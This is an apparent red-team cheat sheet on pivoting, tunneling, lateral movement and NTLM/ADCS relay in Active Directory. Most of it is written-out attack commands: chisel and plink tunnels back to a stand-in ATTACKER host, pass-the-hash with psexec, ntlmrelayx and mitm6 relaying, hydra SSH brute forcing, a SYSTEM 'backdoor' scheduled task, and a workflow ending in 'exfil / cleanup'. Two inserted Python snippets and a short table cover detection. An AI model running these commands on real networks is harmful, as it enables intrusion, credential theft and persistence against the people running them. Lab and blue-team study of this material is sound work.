Network Exploitation & Pivoting
Network Exploitation & Pivoting — Lateral Movement, Tunneling, and Relay Mastery
⚠️ Authorized labs and controlled networks only. Mastering pivoting and lateral movement means mastering the invisible network — this is how attackers and red teams map, move, and persist after gaining a foothold.
I. 🧩 Core Concepts
Pivoting
Using a compromised host to reach internal systems not directly accessible.
Tunneling
Redirecting traffic from one network to another via encrypted or proxy channels.
Port Forwarding
Exposing remote internal ports to your local system.
Lateral Movement
Moving from one compromised system to another using credentials, trust, or protocol.
Relay Attacks
Capturing and relaying authentication (NTLM, Kerberos, etc.) for unauthorized access.
II. 🧭 Initial Network Enumeration (Post-Foothold)
🔹 Network Info
Linux
ip a
netstat -tulnp
ip route
arp -a
Windows
ipconfig /all
route print
arp -a
netstat -ano
🔹 Discover Internal Targets
Linux
nmap -sn 10.10.0.0/24
for i in $(seq 1 254); do ping -c1 10.10.0.$i | grep "bytes from"; done
Windows
for ($i=1; $i -le 254; $i++) { if (Test-Connection -Count 1 -Quiet "10.10.0.$i") { "10.10.0.$i" } }
🔹 Service Identification (proxychains or local)
nmap -sT -Pn -p 21,22,80,135,139,445,3389,5985,1433,3306 10.10.0.0/24
III. 🧱 Port Forwarding Basics
🔹 SSH Local Forward
Redirect a remote internal port to your local machine.
ssh -L 8080:10.10.0.5:80 user@pivot
# Access via http://127.0.0.1:8080
🔹 SSH Remote Forward
Expose your local listener to the remote internal network.
ssh -R 4444:127.0.0.1:4444 user@pivot
# Connect from pivot: nc 127.0.0.1 4444
🔹 Dynamic SOCKS Proxy (via SSH)
ssh -D 9050 user@pivot
proxychains nmap -sT -Pn -p 445,3389 10.10.0.0/24
Configure /etc/proxychains.conf with socks5 127.0.0.1 9050.
IV. 🧠 Advanced Pivoting Tools
Chisel
TCP tunnel / SOCKS proxy
chisel server -p 8000 --reverse
chisel client ATTACKER:8000 R:1080:socks
Socat
Simple port forwarder
socat TCP-LISTEN:4444,fork TCP:10.10.0.5:3389
Plink
Windows SSH tunnel
plink.exe -ssh user@ATTACKER -R 4444:127.0.0.1:3389
FRP (Fast Reverse Proxy)
Full-feature reverse tunnel framework
Use for AD labs (multiple services)
SSHuttle
Transparent network-level proxy
sshuttle -r user@pivot 10.10.0.0/24
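From the defender's side, the tunnel tools above all appear in Sysmon Event ID 3 (network connection) telemetry. The following is an added example, not code from the original page: two heuristics over constructed Sysmon-shaped events, a watchlist of known tunnel binary names and a per-process destination fan-out count that also catches a renamed client carrying a SOCKS pivot; the watchlist, threshold and sample values are assumptions.

```python
# Added example (not from the original page): Sysmon Event ID 3 heuristics for
# tunnel/pivot tooling. Events are constructed dicts using Sysmon's field
# names; the image watchlist and the fan-out threshold are assumptions.
from collections import defaultdict

TUNNEL_IMAGES = {"chisel", "chisel.exe", "socat", "plink.exe", "sshuttle"}  # assumed watchlist
FANOUT_THRESHOLD = 20  # assumed: distinct (ip, port) pairs from one process

def basename(image):
    """Normalise a Windows or Linux image path to a lower-case file name."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()

def tunnel_tool_connections(events):
    """Known tunnel binaries initiating outbound connections. A name match is a
    weak signal on its own; renamed binaries are left to the fan-out check."""
    return sorted({(basename(e["Image"]), e["DestinationIp"]) for e in events
                   if e["EventID"] == 3 and e["Initiated"]
                   and basename(e["Image"]) in TUNNEL_IMAGES})

def proxy_fanout(events):
    """A SOCKS pivot turns one process on the foothold into the source of
    connections to many internal hosts and ports (e.g. proxychains nmap through
    a chisel client). Count distinct destinations per (host, image, pid)."""
    dests = defaultdict(set)
    for e in events:
        if e["EventID"] == 3 and e["Initiated"]:
            key = (e["Computer"], basename(e["Image"]), e["ProcessId"])
            dests[key].add((e["DestinationIp"], e["DestinationPort"]))
    return {k: len(v) for k, v in dests.items() if len(v) >= FANOUT_THRESHOLD}

# Constructed sample: a renamed tunnel client on WEB01 touching 445 on 25 hosts,
# one plink.exe connection to an assumed attacker IP, and one normal browser hit.
SAMPLE = [
    {"EventID": 3, "Computer": "WEB01", "Image": r"C:\Temp\svc-update.exe",
     "ProcessId": 4120, "Initiated": True, "DestinationIp": f"10.10.0.{n}",
     "DestinationPort": 445}
    for n in range(1, 26)
] + [
    {"EventID": 3, "Computer": "WEB01", "Image": r"C:\Users\Public\plink.exe",
     "ProcessId": 5008, "Initiated": True, "DestinationIp": "198.51.100.7",
     "DestinationPort": 22},
    {"EventID": 3, "Computer": "WS1", "Image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "ProcessId": 812, "Initiated": True, "DestinationIp": "10.10.0.5",
     "DestinationPort": 443},
]

if __name__ == "__main__":
    print(tunnel_tool_connections(SAMPLE))
    print(proxy_fanout(SAMPLE))
```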
V. 🔁 Pivot Enumeration (Through Tunnels)
Once SOCKS tunnel is active:
proxychains nmap -sT -Pn -p 80,445,3389 10.10.0.0/24
proxychains crackmapexec smb 10.10.0.0/24 -u user -p pass
proxychains smbclient -L //10.10.0.5 -U user
🧠 Tip: Always pivot layer by layer — confirm internal network segments with route print and ARP sweeps before chaining.
VI. 💣 Lateral Movement Techniques
🔹 Windows (Internal)
WinRM
evil-winrm -i 10.10.0.5 -u user -p pass
SMB/IPC
psexec.py corp.local/user@TARGET -hashes :NTLMHASH
WMI
wmiexec.py user@target
RDP
xfreerdp /v:10.10.0.5 /u:user /p:pass
Scheduled Task
schtasks /create /tn backdoor /tr payload.exe /sc onlogon /ru SYSTEM
Service Abuse
Replace or reconfigure service binary.
🔹 Linux (Internal)
SSH Key Reuse
Password Reuse
hydra -l user -P passlist.txt ssh://10.10.0.5
Rsync, NFS
Abuse writable shares.
Cron Hijack
Replace cross-host sync scripts.
Ansible/SaltStack
Misconfigured management tools.
VII. 🧠 Authentication Relay Attacks (AD)
LLMNR/NBNS Poisoning
Capture and relay NTLM
Responder
NTLM Relay (SMB/HTTP)
Relay captured hashes
ntlmrelayx.py -tf targets.txt -smb2support
ADCS Relay (Cert Attack)
Relay NTLM to ADCS HTTP endpoint
ntlmrelayx --adcs
Printer Bug (SpoolSample)
Force authentication from DC
spoolsample.py
IPv6 MITM (MITM6)
DNS poisoning in AD
mitm6 -d corp.local
🧠 Combine Responder + ntlmrelayx + impacket for chained exploitation.
VIII. ⚙️ Multi-Hop Pivot Scenarios
Example: 3-Layer Chain
[Attacker] ──> [Public Foothold] ──> [Internal Jump Box] ──> [DC]
Setup:
1️⃣ chisel server -p 8000 --reverse on Attacker
2️⃣ On Public Foothold:
./chisel client ATTACKER:8000 R:1080:socks
3️⃣ On Jump Box:
proxychains nmap -sT -Pn 10.10.10.0/24
4️⃣ Access DC via proxy:
proxychains evil-winrm -i 10.10.10.5 -u user -p pass
IX. 🧰 Post-Pivot Enumeration (AD/Enterprise)
Domain Controllers
net view /domain
Identify DCs
Shares
smbclient -L //host -U user
Sensitive data
Logged-in Users
net session / qwinsta
Target movement
Tickets
klist
Check current Kerberos creds
Groups
net group "Domain Admins" /domain
Enumerate admins
X. 🧱 C2 & Tunneling Frameworks (Red-Team Level)
Covenant / Empire / Sliver / Mythic
Full C2 with lateral modules
Metasploit multi/handler
Reverse shell management
Merlin Agent
HTTP/2 encrypted C2
Nimplant / PoshC2
PowerShell-based operations
Ghostpack tools (C#)
Internal AD lateral modules
XI. 🔒 Defense & Detection (Blue/Purple Notes)
Port Forwarding
Indicators: IDS alerts, anomalous listening or open ports
Telemetry: Sysmon Event ID 3 (network connection)
SSH Tunnels
Indicators: unusually long-lived SSH sessions
Telemetry: firewall logs
NTLM Relay
Indicators: SMB/HTTP anomalies
Telemetry: burst of Event 4624 with LogonType 3 (network logon)
Chisel/Socat
Indicators: custom TCP tunnel
Telemetry: network heuristics
Lateral Movement
Indicators: multiple logons from the same user across hosts
Telemetry: Event 4624 LogonType 10 (RemoteInteractive) and LogonType 3 (network)
RDP
Indicators: brute-force attempts, connections from odd source IPs
Telemetry: Event 1149 (TerminalServices-RemoteConnectionManager)
SOCKS Proxy Use
Indicators: DNS anomalies
Telemetry: proxy logs
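The 4624 indicators above can be turned into a small detector. This is an added example, not code from the original page: it runs over constructed Security-log events using the 4624 field names, flags accounts whose network logons (LogonType 3) fan out to many hosts in a short window (the relay and SMB/WinRM lateral-movement shape) and RDP logons (LogonType 10) from sources outside an assumed jump-host allowlist; window, threshold and sample values are assumptions.

```python
# Added example (not from the original page): scoring Security log 4624 events
# for the lateral movement and relay indicators. Events are constructed dicts
# using 4624 field names; window, threshold and jump-host allowlist are assumed.
from collections import defaultdict
from datetime import datetime, timedelta

JUMP_HOSTS = {"10.10.0.2"}       # assumed: sanctioned RDP sources
WINDOW = timedelta(minutes=5)    # assumed burst window
MAX_HOSTS_PER_USER = 3           # assumed: distinct targets before alerting

def network_logon_bursts(events):
    """Accounts with LogonType 3 (network) logons to more than
    MAX_HOSTS_PER_USER distinct computers inside WINDOW. NTLM relay fan-out and
    SMB/WinRM lateral movement both produce this shape."""
    by_user = defaultdict(list)
    for e in events:
        if e["EventID"] == 4624 and e["LogonType"] == 3:
            by_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["Computer"]))
    alerts = {}
    for user, hits in by_user.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):  # sliding window from each logon
            hosts = {h for t, h in hits[i:] if t - t0 <= WINDOW}
            if len(hosts) > MAX_HOSTS_PER_USER:
                alerts[user] = sorted(hosts)
                break
    return alerts

def rdp_from_unexpected_source(events):
    """LogonType 10 (RemoteInteractive, i.e. RDP) from a source address that is
    not an approved jump host; pair with TerminalServices event 1149."""
    return sorted({(e["TargetUserName"], e["IpAddress"]) for e in events
                   if e["EventID"] == 4624 and e["LogonType"] == 10
                   and e["IpAddress"] not in JUMP_HOSTS})

# Constructed sample: svc_backup reaches four hosts in four minutes, alice RDPs
# once from the jump host and once from a workstation, bob makes one normal logon.
def ev(ltype, user, ip, comp, ts):
    return {"EventID": 4624, "LogonType": ltype, "TargetUserName": user,
            "IpAddress": ip, "Computer": comp, "TimeCreated": ts}

SAMPLE = [ev(3, "svc_backup", "10.10.0.5", f"WS{n}", f"2024-01-01T10:0{n}:00") for n in range(1, 5)] + [
    ev(10, "alice", "10.10.0.2", "WS1", "2024-01-01T10:10:00"),
    ev(10, "alice", "10.10.0.77", "DC01", "2024-01-01T10:11:00"),
    ev(3, "bob", "10.10.0.9", "FS1", "2024-01-01T10:12:00"),
]
```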
XII. 🧠 Pivoting Workflow Summary
1️⃣ Identify internal network
2️⃣ Forward one internal service to local
3️⃣ Enumerate behind the pivot
4️⃣ Establish persistent tunnel (Chisel/SSH)
5️⃣ Use proxychains for internal scans
6️⃣ Move laterally via SMB/WinRM/RDP
7️⃣ Pivot deeper or reach DC
8️⃣ Dump / escalate / exfil / cleanup
XIII. 🧱 One-Liner Arsenal
Forward port (Linux)
socat TCP-LISTEN:8080,fork TCP:10.10.0.5:80
Reverse tunnel (SSH)
ssh -R 8080:localhost:8080 user@pivot
SOCKS proxy (SSH)
ssh -D 1080 user@pivot
Proxy scan
proxychains nmap -sT -Pn -p 80,445 10.10.0.0/24
List internal network (PowerShell)
Get-NetIPAddress
Ping sweep (CMD)
for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.0.%i | find "TTL="
XIV. 🧩 Common Pivot Scenarios (HTB / Enterprise)
Linux foothold → Windows internal
chisel SOCKS + proxychains + evil-winrm
Windows foothold → Linux internal
plink reverse + proxychains
No direct egress
use reverse chisel tunnel or ICMP shell
Firewall between subnets
pivot via RDP or SMB relay
Isolated internal segment
SSHuttle, SOCKS chain, or VPN injection
XV. ⚙️ Cleanup
Linux
ps aux | grep chisel; kill -9 PID
rm /tmp/chisel /tmp/socat
unset HTTP_PROXY HTTPS_PROXY
Windows
taskkill /IM plink.exe /F
netsh interface portproxy reset all
🧠 Always restore routing rules after lab testing.